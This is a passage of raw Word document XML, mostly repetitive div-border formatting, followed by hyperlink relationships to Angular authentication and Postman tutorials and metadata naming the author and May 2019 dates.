      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="845559009">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1346857157">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1670673948">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1193113622">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="495077666">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="829058201">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1480922744">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="2116704594">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="851838357">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="923294756">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="8218640">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1340424021">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1260411083">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="276762042">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="743182080">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="2102531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guide/htt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ryanchenkie_40935/angular-authentication-using-the-http-client-and-http-interceptors-2f9d1540eb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ngage.github.io/ngx-paypal/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://learning.getpostman.com/docs/postman/scripts/test_examples/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.angular-university.io/angular-jwt-authentication/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@rameez.s.shaikh/angular-7-spring-boot-basic-authentication-example-98455b73d033" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ryanchenkie.com/angular-authentication-using-the-http-client-and-http-intercepto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3CB8A-D66C-4163-B8FE-1B290E1E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2160</Words>
  <Characters>11886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PICARD Laurent</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Laurent Picard</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-05-30T14:05:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-05-30T14:05:00Z</dcterms:modified>
</cp:coreProperties>
</file>